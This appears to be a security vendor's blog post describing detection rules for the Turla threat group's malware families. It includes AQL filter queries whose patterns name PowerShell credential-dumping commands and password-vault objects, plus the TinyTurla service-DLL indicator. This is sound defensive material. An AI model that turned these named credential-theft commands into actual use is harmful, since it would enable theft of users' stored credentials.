Introduction
A Russian hacker group called Turla is widely known for their attacks. They have been acting since 2004 and made victims in 45 countries. Turla is also a malware, where multitude of different malware families fall under Turla. Familiar names include Epic, TinyTurla, Empire, and more.
The Security Content team investigated Turla attacks based on MITRE ATT&CK techniques. We include both generic technique detection rules as well as Turla specific rules. You may see the difference in the rule names, the generic ones may be named "Suspicious XYZ behaviour" while the Turla specific rules are "Potential Epic Activity".
The reason both rules are included is because Turla involves several techniques to trigger their attack. And this attack can also rise from other attackers. To ensure complete coverage, both generic technique detection rules and Turla-specific rules have been included.
Turla Carbon malware starts with an Initial Access technique. A spearphishing email or a compromised website is used to install a backdoor. Next is Exfiltration where sensitive information is leaked to the attackers. There is also Lateral Movement to move across the network to other computers.
From this, we observe the malware behaviours typically start with an Initial Access, followed by other tactics such as Exfiltration, Collection, Command and Control, and etc.
A total of 374 custom rules are contained in the content extension.
General Techniques
Activities are detected based on MITRE ATT&CK techniques. Some techniques are common to multiple threats. In this case we have created rules that work independently of Turla, which are more common and cover across threats.
Let’s take a look at an example in more detail.
Dump Credentials from Windows Credential Manager with PowerShell
Apply Dump Credentials from Windows Credential Manager With PowerShell on events which are detected by the Local system
and when the event(s) were detected by one or more of Microsoft Windows Security Event Log
and when the event category for the event is one of the following Audit.Command Execution Success, Exploit.Command Execution
and when the event matches (LOWER("Command") LIKE '%get-passwordvaultcredentials%' OR LOWER("Command") LIKE '%get-credmancreds%') OR (LOWER("Command") LIKE '%new-object%' AND LOWER("Command") LIKE '%windows.security.credentials.passwordvault%') OR (LOWER("Command") LIKE '%new-object%' AND LOWER("Command") LIKE '%microsoft.csharp.csharpcodeprovider%' AND LOWER("Command") LIKE '%runtime.interopservices.runtimeenvironment]::getruntimedirectory(%' AND LOWER("Command") LIKE '%collections.arraylist%' AND LOWER("Command") LIKE '%codedom.compiler.compilerparameters%') AQL filter query |
This rule detects adversaries searching for common password storage locations to obtain user credentials. Any commands that potentially refer to Windows credential locations (e.g. password vaults) are monitored.
If the technique is generic enough to raise concerns of false positives, the rule is translated to a building block and must trigger other following malicious behaviours.
File and Directory Permission Modification after Download
Apply File and Directory Permission Modification after Download on events which are detected by the Local system
and when an event matches any of the following BB:DeviceDefinition: Endpoint Devices, BB:DeviceDefinition: Operating System
and when BB:CategoryDefinition: File Permission Changed match at least 1 times with the same Machine Identifier (custom) in 1 hour(s) after BB:BehaviorDefinition: Download Utilities in Events, BB:BehaviorDefinition: PowerShell File Download Activity, BB:CategoryDefinition: Object Download Events match |
This rule has several child building blocks.
BB:CategoryDefinition: File Permission Changed
BB:BehaviorDefinition: Download Utilities in Events
BB:BehaviorDefinition: PowerShell File Download Activity
BB:CategoryDefinition: Object Download Events |
The file download activities are not suspicious by nature, but when file permissions change after a file download, it is suspicious.
Turla Malware Activity
Each rule covers a Turla malware activity. Each rule is composed of multiple building blocks, each discovering a specific activity related to the malware family.
- Potential Carbon Activity
- Potential ComRAT Activity
- Potential Crutch Activity
- Potential Empire Activity
- Potential Epic Activity
- Potential Gazer Activity
- Potential HyperStack Activity
- Potential Kazuar Activity
- Potential LOLBIN Activity
- Potential Mosquito Activity
- Potential TinyTurla Activity
Let’s take a look at a few rules in more detail.
Potential Epic Activity
Apply Potential Epic Activity on events which are detected by the Local system
and when an event matches any of the following BB:BehaviorDefinition: Epic Filenames, BB:BehaviorDefinition: Epic Log Filenames, BB:BehaviorDefinition: Epic Search Terms |
This rule has several child building blocks:
BB:BehaviorDefinition: Epic Filenames
BB:BehaviorDefinition: Epic Log Filenames
BB:BehaviorDefinition: Epic Search Terms |
Turla Epic malware uses spearphishing email, social engineering to install .SCR files, sometimes packaged in .RAR format. It exploits Java, Adobe, or Internet Explorer vulnerabilities to install fake applications that look legit, like adobe installer.
Command and control step for the malware executes reconnaissance commands, which is detected by Potential Turla Recon Activity.
Known malware names and hashes, any keywords included in the commands are monitored.
Potential TinyTurla Activity
Apply Potential TinyTurla Activity on events which are detected by the Local system
and when the event(s) were detected by one or more of Microsoft Windows Security Event Log
and when the event category for the event is one of the following Audit.Object Load Success, System.Successful Registry Modification
and when the event matches LOWER("Filename") MATCHES ('w64time*') OR LOWER("Registry Value Data") MATCHES ('.*?w64time*') AQL filter query |
TinyTurla installs a backdoor called "Windows Time Service" to avoid detection. The service DLL is named w64time.dll, where a benign service DLL w32time.dll exists for Microsoft Windows. The rule detects occurrences of w64time.
Conclusion
Cyber attacks are always evolving. Turla is not an exception. Our content extension cover both generic techniques and Turla-specific behaviour to provide a good security coverage base.
The content is mapped to its respective MITRE ATT&CK mapping on the Use Case Manager.